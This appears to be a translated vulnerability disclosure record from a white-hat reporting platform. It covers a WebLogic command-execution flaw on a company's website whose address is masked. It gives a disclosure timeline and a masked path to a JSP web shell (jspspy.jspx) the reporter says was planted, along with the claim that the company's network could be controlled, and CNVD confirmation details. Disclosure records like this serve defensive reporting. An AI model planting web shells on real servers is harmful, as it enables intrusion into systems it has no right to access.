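2015-12-22: Details reported to the vendor; awaiting vendor response
2015-12-26: Vendor confirmed; details disclosed to the vendor only
2016-01-05: Details disclosed to core white hats and experts in the relevant field
2016-01-15: Details disclosed to regular white hats
2016-01-25: Details disclosed to intern white hats
2016-02-07: Details disclosed to the public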
http://**.**.**.**/ is the official website. WebLogic command execution; shell: http://**.**.**.**/jspspy.jspx
Stopping here; this company's network can be controlled.
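Severity: Medium
Vulnerability Rank: 9
Confirmation time: 2015-12-26 23:38
CNVD has confirmed the situation described and has notified the organization that administers the website through the contact details published on the site.
None yet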